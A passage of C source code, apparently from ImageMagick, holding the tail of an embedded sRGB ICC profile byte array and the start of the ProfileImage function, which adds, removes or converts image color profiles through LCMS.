0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x73, 0x69, 0x67, 0x20, 0x00, 0x00, 0x00, 0x00,
0x43, 0x52, 0x54, 0x20, 0x64, 0x65, 0x73, 0x63, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x0d, 0x49, 0x45, 0x43, 0x36, 0x31, 0x39, 0x36, 0x36,
0x2d, 0x32, 0x2e, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x0d, 0x49, 0x45, 0x43, 0x36, 0x31, 0x39, 0x36, 0x36,
0x2d, 0x32, 0x2e, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x76, 0x69, 0x65, 0x77, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0xa4, 0x7c,
0x00, 0x14, 0x5f, 0x30, 0x00, 0x10, 0xce, 0x02, 0x00, 0x03, 0xed, 0xb2,
0x00, 0x04, 0x13, 0x0a, 0x00, 0x03, 0x5c, 0x67, 0x00, 0x00, 0x00, 0x01,
0x58, 0x59, 0x5a, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x0a, 0x3d,
0x00, 0x50, 0x00, 0x00, 0x00, 0x57, 0x1e, 0xb8, 0x6d, 0x65, 0x61, 0x73,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x02, 0x8f, 0x00, 0x00, 0x00, 0x02, 0x58, 0x59, 0x5a, 0x20,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf3, 0x51, 0x00, 0x01, 0x00, 0x00,
0x00, 0x01, 0x16, 0xcc, 0x58, 0x59, 0x5a, 0x20, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x58, 0x59, 0x5a, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6f, 0xa0,
0x00, 0x00, 0x38, 0xf5, 0x00, 0x00, 0x03, 0x90, 0x58, 0x59, 0x5a, 0x20,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x97, 0x00, 0x00, 0xb7, 0x87,
0x00, 0x00, 0x18, 0xd9, 0x58, 0x59, 0x5a, 0x20, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x24, 0x9f, 0x00, 0x00, 0x0f, 0x84, 0x00, 0x00, 0xb6, 0xc4,
0x63, 0x75, 0x72, 0x76, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
0x00, 0x00, 0x00, 0x05, 0x00, 0x0a, 0x00, 0x0f, 0x00, 0x14, 0x00, 0x19,
0x00, 0x1e, 0x00, 0x23, 0x00, 0x28, 0x00, 0x2d, 0x00, 0x32, 0x00, 0x37,
0x00, 0x3b, 0x00, 0x40, 0x00, 0x45, 0x00, 0x4a, 0x00, 0x4f, 0x00, 0x54,
0x00, 0x59, 0x00, 0x5e, 0x00, 0x63, 0x00, 0x68, 0x00, 0x6d, 0x00, 0x72,
0x00, 0x77, 0x00, 0x7c, 0x00, 0x81, 0x00, 0x86, 0x00, 0x8b, 0x00, 0x90,
0x00, 0x95, 0x00, 0x9a, 0x00, 0x9f, 0x00, 0xa4, 0x00, 0xa9, 0x00, 0xae,
0x00, 0xb2, 0x00, 0xb7, 0x00, 0xbc, 0x00, 0xc1, 0x00, 0xc6, 0x00, 0xcb,
0x00, 0xd0, 0x00, 0xd5, 0x00, 0xdb, 0x00, 0xe0, 0x00, 0xe5, 0x00, 0xeb,
0x00, 0xf0, 0x00, 0xf6, 0x00, 0xfb, 0x01, 0x01, 0x01, 0x07, 0x01, 0x0d,
0x01, 0x13, 0x01, 0x19, 0x01, 0x1f, 0x01, 0x25, 0x01, 0x2b, 0x01, 0x32,
0x01, 0x38, 0x01, 0x3e, 0x01, 0x45, 0x01, 0x4c, 0x01, 0x52, 0x01, 0x59,
0x01, 0x60, 0x01, 0x67, 0x01, 0x6e, 0x01, 0x75, 0x01, 0x7c, 0x01, 0x83,
0x01, 0x8b, 0x01, 0x92, 0x01, 0x9a, 0x01, 0xa1, 0x01, 0xa9, 0x01, 0xb1,
0x01, 0xb9, 0x01, 0xc1, 0x01, 0xc9, 0x01, 0xd1, 0x01, 0xd9, 0x01, 0xe1,
0x01, 0xe9, 0x01, 0xf2, 0x01, 0xfa, 0x02, 0x03, 0x02, 0x0c, 0x02, 0x14,
0x02, 0x1d, 0x02, 0x26, 0x02, 0x2f, 0x02, 0x38, 0x02, 0x41, 0x02, 0x4b,
0x02, 0x54, 0x02, 0x5d, 0x02, 0x67, 0x02, 0x71, 0x02, 0x7a, 0x02, 0x84,
0x02, 0x8e, 0x02, 0x98, 0x02, 0xa2, 0x02, 0xac, 0x02, 0xb6, 0x02, 0xc1,
0x02, 0xcb, 0x02, 0xd5, 0x02, 0xe0, 0x02, 0xeb, 0x02, 0xf5, 0x03, 0x00,
0x03, 0x0b, 0x03, 0x16, 0x03, 0x21, 0x03, 0x2d, 0x03, 0x38, 0x03, 0x43,
0x03, 0x4f, 0x03, 0x5a, 0x03, 0x66, 0x03, 0x72, 0x03, 0x7e, 0x03, 0x8a,
0x03, 0x96, 0x03, 0xa2, 0x03, 0xae, 0x03, 0xba, 0x03, 0xc7, 0x03, 0xd3,
0x03, 0xe0, 0x03, 0xec, 0x03, 0xf9, 0x04, 0x06, 0x04, 0x13, 0x04, 0x20,
0x04, 0x2d, 0x04, 0x3b, 0x04, 0x48, 0x04, 0x55, 0x04, 0x63, 0x04, 0x71,
0x04, 0x7e, 0x04, 0x8c, 0x04, 0x9a, 0x04, 0xa8, 0x04, 0xb6, 0x04, 0xc4,
0x04, 0xd3, 0x04, 0xe1, 0x04, 0xf0, 0x04, 0xfe, 0x05, 0x0d, 0x05, 0x1c,
0x05, 0x2b, 0x05, 0x3a, 0x05, 0x49, 0x05, 0x58, 0x05, 0x67, 0x05, 0x77,
0x05, 0x86, 0x05, 0x96, 0x05, 0xa6, 0x05, 0xb5, 0x05, 0xc5, 0x05, 0xd5,
0x05, 0xe5, 0x05, 0xf6, 0x06, 0x06, 0x06, 0x16, 0x06, 0x27, 0x06, 0x37,
0x06, 0x48, 0x06, 0x59, 0x06, 0x6a, 0x06, 0x7b, 0x06, 0x8c, 0x06, 0x9d,
0x06, 0xaf, 0x06, 0xc0, 0x06, 0xd1, 0x06, 0xe3, 0x06, 0xf5, 0x07, 0x07,
0x07, 0x19, 0x07, 0x2b, 0x07, 0x3d, 0x07, 0x4f, 0x07, 0x61, 0x07, 0x74,
0x07, 0x86, 0x07, 0x99, 0x07, 0xac, 0x07, 0xbf, 0x07, 0xd2, 0x07, 0xe5,
0x07, 0xf8, 0x08, 0x0b, 0x08, 0x1f, 0x08, 0x32, 0x08, 0x46, 0x08, 0x5a,
0x08, 0x6e, 0x08, 0x82, 0x08, 0x96, 0x08, 0xaa, 0x08, 0xbe, 0x08, 0xd2,
0x08, 0xe7, 0x08, 0xfb, 0x09, 0x10, 0x09, 0x25, 0x09, 0x3a, 0x09, 0x4f,
0x09, 0x64, 0x09, 0x79, 0x09, 0x8f, 0x09, 0xa4, 0x09, 0xba, 0x09, 0xcf,
0x09, 0xe5, 0x09, 0xfb, 0x0a, 0x11, 0x0a, 0x27, 0x0a, 0x3d, 0x0a, 0x54,
0x0a, 0x6a, 0x0a, 0x81, 0x0a, 0x98, 0x0a, 0xae, 0x0a, 0xc5, 0x0a, 0xdc,
0x0a, 0xf3, 0x0b, 0x0b, 0x0b, 0x22, 0x0b, 0x39, 0x0b, 0x51, 0x0b, 0x69,
0x0b, 0x80, 0x0b, 0x98, 0x0b, 0xb0, 0x0b, 0xc8, 0x0b, 0xe1, 0x0b, 0xf9,
0x0c, 0x12, 0x0c, 0x2a, 0x0c, 0x43, 0x0c, 0x5c, 0x0c, 0x75, 0x0c, 0x8e,
0x0c, 0xa7, 0x0c, 0xc0, 0x0c, 0xd9, 0x0c, 0xf3, 0x0d, 0x0d, 0x0d, 0x26,
0x0d, 0x40, 0x0d, 0x5a, 0x0d, 0x74, 0x0d, 0x8e, 0x0d, 0xa9, 0x0d, 0xc3,
0x0d, 0xde, 0x0d, 0xf8, 0x0e, 0x13, 0x0e, 0x2e, 0x0e, 0x49, 0x0e, 0x64,
0x0e, 0x7f, 0x0e, 0x9b, 0x0e, 0xb6, 0x0e, 0xd2, 0x0e, 0xee, 0x0f, 0x09,
0x0f, 0x25, 0x0f, 0x41, 0x0f, 0x5e, 0x0f, 0x7a, 0x0f, 0x96, 0x0f, 0xb3,
0x0f, 0xcf, 0x0f, 0xec, 0x10, 0x09, 0x10, 0x26, 0x10, 0x43, 0x10, 0x61,
0x10, 0x7e, 0x10, 0x9b, 0x10, 0xb9, 0x10, 0xd7, 0x10, 0xf5, 0x11, 0x13,
0x11, 0x31, 0x11, 0x4f, 0x11, 0x6d, 0x11, 0x8c, 0x11, 0xaa, 0x11, 0xc9,
0x11, 0xe8, 0x12, 0x07, 0x12, 0x26, 0x12, 0x45, 0x12, 0x64, 0x12, 0x84,
0x12, 0xa3, 0x12, 0xc3, 0x12, 0xe3, 0x13, 0x03, 0x13, 0x23, 0x13, 0x43,
0x13, 0x63, 0x13, 0x83, 0x13, 0xa4, 0x13, 0xc5, 0x13, 0xe5, 0x14, 0x06,
0x14, 0x27, 0x14, 0x49, 0x14, 0x6a, 0x14, 0x8b, 0x14, 0xad, 0x14, 0xce,
0x14, 0xf0, 0x15, 0x12, 0x15, 0x34, 0x15, 0x56, 0x15, 0x78, 0x15, 0x9b,
0x15, 0xbd, 0x15, 0xe0, 0x16, 0x03, 0x16, 0x26, 0x16, 0x49, 0x16, 0x6c,
0x16, 0x8f, 0x16, 0xb2, 0x16, 0xd6, 0x16, 0xfa, 0x17, 0x1d, 0x17, 0x41,
0x17, 0x65, 0x17, 0x89, 0x17, 0xae, 0x17, 0xd2, 0x17, 0xf7, 0x18, 0x1b,
0x18, 0x40, 0x18, 0x65, 0x18, 0x8a, 0x18, 0xaf, 0x18, 0xd5, 0x18, 0xfa,
0x19, 0x20, 0x19, 0x45, 0x19, 0x6b, 0x19, 0x91, 0x19, 0xb7, 0x19, 0xdd,
0x1a, 0x04, 0x1a, 0x2a, 0x1a, 0x51, 0x1a, 0x77, 0x1a, 0x9e, 0x1a, 0xc5,
0x1a, 0xec, 0x1b, 0x14, 0x1b, 0x3b, 0x1b, 0x63, 0x1b, 0x8a, 0x1b, 0xb2,
0x1b, 0xda, 0x1c, 0x02, 0x1c, 0x2a, 0x1c, 0x52, 0x1c, 0x7b, 0x1c, 0xa3,
0x1c, 0xcc, 0x1c, 0xf5, 0x1d, 0x1e, 0x1d, 0x47, 0x1d, 0x70, 0x1d, 0x99,
0x1d, 0xc3, 0x1d, 0xec, 0x1e, 0x16, 0x1e, 0x40, 0x1e, 0x6a, 0x1e, 0x94,
0x1e, 0xbe, 0x1e, 0xe9, 0x1f, 0x13, 0x1f, 0x3e, 0x1f, 0x69, 0x1f, 0x94,
0x1f, 0xbf, 0x1f, 0xea, 0x20, 0x15, 0x20, 0x41, 0x20, 0x6c, 0x20, 0x98,
0x20, 0xc4, 0x20, 0xf0, 0x21, 0x1c, 0x21, 0x48, 0x21, 0x75, 0x21, 0xa1,
0x21, 0xce, 0x21, 0xfb, 0x22, 0x27, 0x22, 0x55, 0x22, 0x82, 0x22, 0xaf,
0x22, 0xdd, 0x23, 0x0a, 0x23, 0x38, 0x23, 0x66, 0x23, 0x94, 0x23, 0xc2,
0x23, 0xf0, 0x24, 0x1f, 0x24, 0x4d, 0x24, 0x7c, 0x24, 0xab, 0x24, 0xda,
0x25, 0x09, 0x25, 0x38, 0x25, 0x68, 0x25, 0x97, 0x25, 0xc7, 0x25, 0xf7,
0x26, 0x27, 0x26, 0x57, 0x26, 0x87, 0x26, 0xb7, 0x26, 0xe8, 0x27, 0x18,
0x27, 0x49, 0x27, 0x7a, 0x27, 0xab, 0x27, 0xdc, 0x28, 0x0d, 0x28, 0x3f,
0x28, 0x71, 0x28, 0xa2, 0x28, 0xd4, 0x29, 0x06, 0x29, 0x38, 0x29, 0x6b,
0x29, 0x9d, 0x29, 0xd0, 0x2a, 0x02, 0x2a, 0x35, 0x2a, 0x68, 0x2a, 0x9b,
0x2a, 0xcf, 0x2b, 0x02, 0x2b, 0x36, 0x2b, 0x69, 0x2b, 0x9d, 0x2b, 0xd1,
0x2c, 0x05, 0x2c, 0x39, 0x2c, 0x6e, 0x2c, 0xa2, 0x2c, 0xd7, 0x2d, 0x0c,
0x2d, 0x41, 0x2d, 0x76, 0x2d, 0xab, 0x2d, 0xe1, 0x2e, 0x16, 0x2e, 0x4c,
0x2e, 0x82, 0x2e, 0xb7, 0x2e, 0xee, 0x2f, 0x24, 0x2f, 0x5a, 0x2f, 0x91,
0x2f, 0xc7, 0x2f, 0xfe, 0x30, 0x35, 0x30, 0x6c, 0x30, 0xa4, 0x30, 0xdb,
0x31, 0x12, 0x31, 0x4a, 0x31, 0x82, 0x31, 0xba, 0x31, 0xf2, 0x32, 0x2a,
0x32, 0x63, 0x32, 0x9b, 0x32, 0xd4, 0x33, 0x0d, 0x33, 0x46, 0x33, 0x7f,
0x33, 0xb8, 0x33, 0xf1, 0x34, 0x2b, 0x34, 0x65, 0x34, 0x9e, 0x34, 0xd8,
0x35, 0x13, 0x35, 0x4d, 0x35, 0x87, 0x35, 0xc2, 0x35, 0xfd, 0x36, 0x37,
0x36, 0x72, 0x36, 0xae, 0x36, 0xe9, 0x37, 0x24, 0x37, 0x60, 0x37, 0x9c,
0x37, 0xd7, 0x38, 0x14, 0x38, 0x50, 0x38, 0x8c, 0x38, 0xc8, 0x39, 0x05,
0x39, 0x42, 0x39, 0x7f, 0x39, 0xbc, 0x39, 0xf9, 0x3a, 0x36, 0x3a, 0x74,
0x3a, 0xb2, 0x3a, 0xef, 0x3b, 0x2d, 0x3b, 0x6b, 0x3b, 0xaa, 0x3b, 0xe8,
0x3c, 0x27, 0x3c, 0x65, 0x3c, 0xa4, 0x3c, 0xe3, 0x3d, 0x22, 0x3d, 0x61,
0x3d, 0xa1, 0x3d, 0xe0, 0x3e, 0x20, 0x3e, 0x60, 0x3e, 0xa0, 0x3e, 0xe0,
0x3f, 0x21, 0x3f, 0x61, 0x3f, 0xa2, 0x3f, 0xe2, 0x40, 0x23, 0x40, 0x64,
0x40, 0xa6, 0x40, 0xe7, 0x41, 0x29, 0x41, 0x6a, 0x41, 0xac, 0x41, 0xee,
0x42, 0x30, 0x42, 0x72, 0x42, 0xb5, 0x42, 0xf7, 0x43, 0x3a, 0x43, 0x7d,
0x43, 0xc0, 0x44, 0x03, 0x44, 0x47, 0x44, 0x8a, 0x44, 0xce, 0x45, 0x12,
0x45, 0x55, 0x45, 0x9a, 0x45, 0xde, 0x46, 0x22, 0x46, 0x67, 0x46, 0xab,
0x46, 0xf0, 0x47, 0x35, 0x47, 0x7b, 0x47, 0xc0, 0x48, 0x05, 0x48, 0x4b,
0x48, 0x91, 0x48, 0xd7, 0x49, 0x1d, 0x49, 0x63, 0x49, 0xa9, 0x49, 0xf0,
0x4a, 0x37, 0x4a, 0x7d, 0x4a, 0xc4, 0x4b, 0x0c, 0x4b, 0x53, 0x4b, 0x9a,
0x4b, 0xe2, 0x4c, 0x2a, 0x4c, 0x72, 0x4c, 0xba, 0x4d, 0x02, 0x4d, 0x4a,
0x4d, 0x93, 0x4d, 0xdc, 0x4e, 0x25, 0x4e, 0x6e, 0x4e, 0xb7, 0x4f, 0x00,
0x4f, 0x49, 0x4f, 0x93, 0x4f, 0xdd, 0x50, 0x27, 0x50, 0x71, 0x50, 0xbb,
0x51, 0x06, 0x51, 0x50, 0x51, 0x9b, 0x51, 0xe6, 0x52, 0x31, 0x52, 0x7c,
0x52, 0xc7, 0x53, 0x13, 0x53, 0x5f, 0x53, 0xaa, 0x53, 0xf6, 0x54, 0x42,
0x54, 0x8f, 0x54, 0xdb, 0x55, 0x28, 0x55, 0x75, 0x55, 0xc2, 0x56, 0x0f,
0x56, 0x5c, 0x56, 0xa9, 0x56, 0xf7, 0x57, 0x44, 0x57, 0x92, 0x57, 0xe0,
0x58, 0x2f, 0x58, 0x7d, 0x58, 0xcb, 0x59, 0x1a, 0x59, 0x69, 0x59, 0xb8,
0x5a, 0x07, 0x5a, 0x56, 0x5a, 0xa6, 0x5a, 0xf5, 0x5b, 0x45, 0x5b, 0x95,
0x5b, 0xe5, 0x5c, 0x35, 0x5c, 0x86, 0x5c, 0xd6, 0x5d, 0x27, 0x5d, 0x78,
0x5d, 0xc9, 0x5e, 0x1a, 0x5e, 0x6c, 0x5e, 0xbd, 0x5f, 0x0f, 0x5f, 0x61,
0x5f, 0xb3, 0x60, 0x05, 0x60, 0x57, 0x60, 0xaa, 0x60, 0xfc, 0x61, 0x4f,
0x61, 0xa2, 0x61, 0xf5, 0x62, 0x49, 0x62, 0x9c, 0x62, 0xf0, 0x63, 0x43,
0x63, 0x97, 0x63, 0xeb, 0x64, 0x40, 0x64, 0x94, 0x64, 0xe9, 0x65, 0x3d,
0x65, 0x92, 0x65, 0xe7, 0x66, 0x3d, 0x66, 0x92, 0x66, 0xe8, 0x67, 0x3d,
0x67, 0x93, 0x67, 0xe9, 0x68, 0x3f, 0x68, 0x96, 0x68, 0xec, 0x69, 0x43,
0x69, 0x9a, 0x69, 0xf1, 0x6a, 0x48, 0x6a, 0x9f, 0x6a, 0xf7, 0x6b, 0x4f,
0x6b, 0xa7, 0x6b, 0xff, 0x6c, 0x57, 0x6c, 0xaf, 0x6d, 0x08, 0x6d, 0x60,
0x6d, 0xb9, 0x6e, 0x12, 0x6e, 0x6b, 0x6e, 0xc4, 0x6f, 0x1e, 0x6f, 0x78,
0x6f, 0xd1, 0x70, 0x2b, 0x70, 0x86, 0x70, 0xe0, 0x71, 0x3a, 0x71, 0x95,
0x71, 0xf0, 0x72, 0x4b, 0x72, 0xa6, 0x73, 0x01, 0x73, 0x5d, 0x73, 0xb8,
0x74, 0x14, 0x74, 0x70, 0x74, 0xcc, 0x75, 0x28, 0x75, 0x85, 0x75, 0xe1,
0x76, 0x3e, 0x76, 0x9b, 0x76, 0xf8, 0x77, 0x56, 0x77, 0xb3, 0x78, 0x11,
0x78, 0x6e, 0x78, 0xcc, 0x79, 0x2a, 0x79, 0x89, 0x79, 0xe7, 0x7a, 0x46,
0x7a, 0xa5, 0x7b, 0x04, 0x7b, 0x63, 0x7b, 0xc2, 0x7c, 0x21, 0x7c, 0x81,
0x7c, 0xe1, 0x7d, 0x41, 0x7d, 0xa1, 0x7e, 0x01, 0x7e, 0x62, 0x7e, 0xc2,
0x7f, 0x23, 0x7f, 0x84, 0x7f, 0xe5, 0x80, 0x47, 0x80, 0xa8, 0x81, 0x0a,
0x81, 0x6b, 0x81, 0xcd, 0x82, 0x30, 0x82, 0x92, 0x82, 0xf4, 0x83, 0x57,
0x83, 0xba, 0x84, 0x1d, 0x84, 0x80, 0x84, 0xe3, 0x85, 0x47, 0x85, 0xab,
0x86, 0x0e, 0x86, 0x72, 0x86, 0xd7, 0x87, 0x3b, 0x87, 0x9f, 0x88, 0x04,
0x88, 0x69, 0x88, 0xce, 0x89, 0x33, 0x89, 0x99, 0x89, 0xfe, 0x8a, 0x64,
0x8a, 0xca, 0x8b, 0x30, 0x8b, 0x96, 0x8b, 0xfc, 0x8c, 0x63, 0x8c, 0xca,
0x8d, 0x31, 0x8d, 0x98, 0x8d, 0xff, 0x8e, 0x66, 0x8e, 0xce, 0x8f, 0x36,
0x8f, 0x9e, 0x90, 0x06, 0x90, 0x6e, 0x90, 0xd6, 0x91, 0x3f, 0x91, 0xa8,
0x92, 0x11, 0x92, 0x7a, 0x92, 0xe3, 0x93, 0x4d, 0x93, 0xb6, 0x94, 0x20,
0x94, 0x8a, 0x94, 0xf4, 0x95, 0x5f, 0x95, 0xc9, 0x96, 0x34, 0x96, 0x9f,
0x97, 0x0a, 0x97, 0x75, 0x97, 0xe0, 0x98, 0x4c, 0x98, 0xb8, 0x99, 0x24,
0x99, 0x90, 0x99, 0xfc, 0x9a, 0x68, 0x9a, 0xd5, 0x9b, 0x42, 0x9b, 0xaf,
0x9c, 0x1c, 0x9c, 0x89, 0x9c, 0xf7, 0x9d, 0x64, 0x9d, 0xd2, 0x9e, 0x40,
0x9e, 0xae, 0x9f, 0x1d, 0x9f, 0x8b, 0x9f, 0xfa, 0xa0, 0x69, 0xa0, 0xd8,
0xa1, 0x47, 0xa1, 0xb6, 0xa2, 0x26, 0xa2, 0x96, 0xa3, 0x06, 0xa3, 0x76,
0xa3, 0xe6, 0xa4, 0x56, 0xa4, 0xc7, 0xa5, 0x38, 0xa5, 0xa9, 0xa6, 0x1a,
0xa6, 0x8b, 0xa6, 0xfd, 0xa7, 0x6e, 0xa7, 0xe0, 0xa8, 0x52, 0xa8, 0xc4,
0xa9, 0x37, 0xa9, 0xa9, 0xaa, 0x1c, 0xaa, 0x8f, 0xab, 0x02, 0xab, 0x75,
0xab, 0xe9, 0xac, 0x5c, 0xac, 0xd0, 0xad, 0x44, 0xad, 0xb8, 0xae, 0x2d,
0xae, 0xa1, 0xaf, 0x16, 0xaf, 0x8b, 0xb0, 0x00, 0xb0, 0x75, 0xb0, 0xea,
0xb1, 0x60, 0xb1, 0xd6, 0xb2, 0x4b, 0xb2, 0xc2, 0xb3, 0x38, 0xb3, 0xae,
0xb4, 0x25, 0xb4, 0x9c, 0xb5, 0x13, 0xb5, 0x8a, 0xb6, 0x01, 0xb6, 0x79,
0xb6, 0xf0, 0xb7, 0x68, 0xb7, 0xe0, 0xb8, 0x59, 0xb8, 0xd1, 0xb9, 0x4a,
0xb9, 0xc2, 0xba, 0x3b, 0xba, 0xb5, 0xbb, 0x2e, 0xbb, 0xa7, 0xbc, 0x21,
0xbc, 0x9b, 0xbd, 0x15, 0xbd, 0x8f, 0xbe, 0x0a, 0xbe, 0x84, 0xbe, 0xff,
0xbf, 0x7a, 0xbf, 0xf5, 0xc0, 0x70, 0xc0, 0xec, 0xc1, 0x67, 0xc1, 0xe3,
0xc2, 0x5f, 0xc2, 0xdb, 0xc3, 0x58, 0xc3, 0xd4, 0xc4, 0x51, 0xc4, 0xce,
0xc5, 0x4b, 0xc5, 0xc8, 0xc6, 0x46, 0xc6, 0xc3, 0xc7, 0x41, 0xc7, 0xbf,
0xc8, 0x3d, 0xc8, 0xbc, 0xc9, 0x3a, 0xc9, 0xb9, 0xca, 0x38, 0xca, 0xb7,
0xcb, 0x36, 0xcb, 0xb6, 0xcc, 0x35, 0xcc, 0xb5, 0xcd, 0x35, 0xcd, 0xb5,
0xce, 0x36, 0xce, 0xb6, 0xcf, 0x37, 0xcf, 0xb8, 0xd0, 0x39, 0xd0, 0xba,
0xd1, 0x3c, 0xd1, 0xbe, 0xd2, 0x3f, 0xd2, 0xc1, 0xd3, 0x44, 0xd3, 0xc6,
0xd4, 0x49, 0xd4, 0xcb, 0xd5, 0x4e, 0xd5, 0xd1, 0xd6, 0x55, 0xd6, 0xd8,
0xd7, 0x5c, 0xd7, 0xe0, 0xd8, 0x64, 0xd8, 0xe8, 0xd9, 0x6c, 0xd9, 0xf1,
0xda, 0x76, 0xda, 0xfb, 0xdb, 0x80, 0xdc, 0x05, 0xdc, 0x8a, 0xdd, 0x10,
0xdd, 0x96, 0xde, 0x1c, 0xde, 0xa2, 0xdf, 0x29, 0xdf, 0xaf, 0xe0, 0x36,
0xe0, 0xbd, 0xe1, 0x44, 0xe1, 0xcc, 0xe2, 0x53, 0xe2, 0xdb, 0xe3, 0x63,
0xe3, 0xeb, 0xe4, 0x73, 0xe4, 0xfc, 0xe5, 0x84, 0xe6, 0x0d, 0xe6, 0x96,
0xe7, 0x1f, 0xe7, 0xa9, 0xe8, 0x32, 0xe8, 0xbc, 0xe9, 0x46, 0xe9, 0xd0,
0xea, 0x5b, 0xea, 0xe5, 0xeb, 0x70, 0xeb, 0xfb, 0xec, 0x86, 0xed, 0x11,
0xed, 0x9c, 0xee, 0x28, 0xee, 0xb4, 0xef, 0x40, 0xef, 0xcc, 0xf0, 0x58,
0xf0, 0xe5, 0xf1, 0x72, 0xf1, 0xff, 0xf2, 0x8c, 0xf3, 0x19, 0xf3, 0xa7,
0xf4, 0x34, 0xf4, 0xc2, 0xf5, 0x50, 0xf5, 0xde, 0xf6, 0x6d, 0xf6, 0xfb,
0xf7, 0x8a, 0xf8, 0x19, 0xf8, 0xa8, 0xf9, 0x38, 0xf9, 0xc7, 0xfa, 0x57,
0xfa, 0xe7, 0xfb, 0x77, 0xfc, 0x07, 0xfc, 0x98, 0xfd, 0x29, 0xfd, 0xba,
0xfe, 0x4b, 0xfe, 0xdc, 0xff, 0x6d, 0xff, 0xff
};
StringInfo
*profile;
MagickBooleanType
status;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (GetImageProfile(image,"icc") != (const StringInfo *) NULL)
return(MagickFalse);
profile=AcquireStringInfo(sizeof(sRGBProfile));
SetStringInfoDatum(profile,sRGBProfile);
status=SetImageProfile(image,"icc",profile,exception);
profile=DestroyStringInfo(profile);
return(status);
}
MagickExport MagickBooleanType ProfileImage(Image *image,const char *name,
const void *datum,const size_t length,ExceptionInfo *exception)
{
#define ProfileImageTag "Profile/Image"
#define ThrowProfileException(severity,tag,context) \
{ \
if (source_profile != (cmsHPROFILE) NULL) \
(void) cmsCloseProfile(source_profile); \
if (target_profile != (cmsHPROFILE) NULL) \
(void) cmsCloseProfile(target_profile); \
ThrowBinaryException(severity,tag,context); \
}
MagickBooleanType
status;
StringInfo
*profile;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(name != (const char *) NULL);
if ((datum == (const void *) NULL) || (length == 0))
{
char
*next;
/*
Delete image profile(s).
*/
ResetImageProfileIterator(image);
for (next=GetNextImageProfile(image); next != (const char *) NULL; )
{
if (IsOptionMember(next,name) != MagickFalse)
{
(void) DeleteImageProfile(image,next);
ResetImageProfileIterator(image);
}
next=GetNextImageProfile(image);
}
return(MagickTrue);
}
/*
Add a ICC, IPTC, or generic profile to the image.
*/
status=MagickTrue;
profile=AcquireStringInfo((size_t) length);
SetStringInfoDatum(profile,(unsigned char *) datum);
if ((LocaleCompare(name,"icc") != 0) && (LocaleCompare(name,"icm") != 0))
status=SetImageProfile(image,name,profile,exception);
else
{
const StringInfo
*icc_profile;
icc_profile=GetImageProfile(image,"icc");
if ((icc_profile != (const StringInfo *) NULL) &&
(CompareStringInfo(icc_profile,profile) == 0))
{
const char
*value;
value=GetImageProperty(image,"exif:ColorSpace",exception);
(void) value;
if (LocaleCompare(value,"1") != 0)
(void) SetsRGBImageProfile(image,exception);
value=GetImageProperty(image,"exif:InteroperabilityIndex",exception);
if (LocaleCompare(value,"R98.") != 0)
(void) SetsRGBImageProfile(image,exception);
/* Future.
value=GetImageProperty(image,"exif:InteroperabilityIndex",exception);
if (LocaleCompare(value,"R03.") != 0)
(void) SetAdobeRGB1998ImageProfile(image,exception);
*/
icc_profile=GetImageProfile(image,"icc");
}
if ((icc_profile != (const StringInfo *) NULL) &&
(CompareStringInfo(icc_profile,profile) == 0))
{
profile=DestroyStringInfo(profile);
return(MagickTrue);
}
#if !defined(MAGICKCORE_LCMS_DELEGATE)
(void) ThrowMagickException(exception,GetMagickModule(),
MissingDelegateWarning,"DelegateLibrarySupportNotBuiltIn",
"'%s' (LCMS)",image->filename);
#else
{
cmsHPROFILE
source_profile;
CMSExceptionInfo
cms_exception;
/*
Transform pixel colors as defined by the color profiles.
*/
cmsSetLogErrorHandler(CMSExceptionHandler);
cms_exception.image=image;
cms_exception.exception=exception;
(void) cms_exception;
source_profile=cmsOpenProfileFromMemTHR((cmsContext) &cms_exception,
GetStringInfoDatum(profile),(cmsUInt32Number)
GetStringInfoLength(profile));
if (source_profile == (cmsHPROFILE) NULL)
ThrowBinaryException(ResourceLimitError,
"ColorspaceColorProfileMismatch",name);
if ((cmsGetDeviceClass(source_profile) != cmsSigLinkClass) &&
(icc_profile == (StringInfo *) NULL))
status=SetImageProfile(image,name,profile,exception);
else
{
CacheView
*image_view;
ColorspaceType
source_colorspace,
target_colorspace;
cmsColorSpaceSignature
signature;
cmsHPROFILE
target_profile;
cmsHTRANSFORM
*magick_restrict transform;
cmsUInt32Number
flags,
source_type,
target_type;
int
intent;
MagickOffsetType
progress;
size_t
source_channels,
target_channels;
ssize_t
y;
unsigned short
**magick_restrict source_pixels,
**magick_restrict target_pixels;
target_profile=(cmsHPROFILE) NULL;
if (icc_profile != (StringInfo *) NULL)
{
target_profile=source_profile;
source_profile=cmsOpenProfileFromMemTHR((cmsContext)
&cms_exception,GetStringInfoDatum(icc_profile),
